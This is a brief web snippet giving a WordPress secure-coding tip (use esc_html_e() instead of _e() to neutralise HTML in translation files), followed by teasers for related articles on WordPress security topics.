WordPress, use esc_html_e() instead of _e()

For maximum security, use esc_html_e() instead of _e() (and esc_html__()/__()), to ensure any unwanted HTML snuck into a translation file is neutralised.
For strings that have HTML in them, use wp_…

Similar

Find hidden pages on WordPress sites

In December WordPress 4.7 was released. The most cool part of this release was the inclusion of the WordPress REST API. In development for quite some time it was finally included in core. The WordPress REST API is great for developers because it makes it ...

Read more »

The Man Behind WordPress Plugin Spam

This is a follow-up to our story titled “Display Widgets Plugin Includes Malicious Code to Publish Spam on WP Sites“. In this post, we explore who is behind the purchase and corruption of the Display Widgets plugin and at least two other popular WordPress... (more…)

Read more »

WordPress Now on HackerOne

WordPress has grown a lot over the last thirteen years – it now powers more than 28% of the top ten million sites on the web. During this growth, each team has worked hard to continually improve th… (more…)

Read more »